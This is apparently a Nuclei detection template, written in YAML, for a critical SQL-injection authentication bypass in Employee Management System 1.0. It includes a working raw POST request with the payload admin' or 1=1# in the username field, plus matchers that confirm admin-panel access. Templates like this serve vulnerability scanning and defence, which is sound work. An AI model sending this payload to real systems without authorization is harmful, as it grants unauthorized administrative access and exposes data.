id: ems-sqli info: name: Employee Management System 1.0 - SQL Injection author: arafatansari severity: critical description: | Employee Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/48882 - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: verified: true max-request: 1 tags: ems,sqli,cms,auth-bypass,edb http: - raw: - | POST /process/aprocess.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded mailuid=admin' or 1=1#&pwd={{rand_base(5)}}&login-submit=Login host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - 'Admin Panel' - 'Log Out' - 'Employee Management System' condition: and - type: status status: - 200 # digest: 490a004630440220495a1734a2d13880983f6999ef0a455d784a639df64c44d0eab8c51e5ef49900022054327dfd19f47691299fe0b2d6f895925327d1c464a8636e33d87c0a7b9dc030:922c64590222798bb761d5b6d8e72950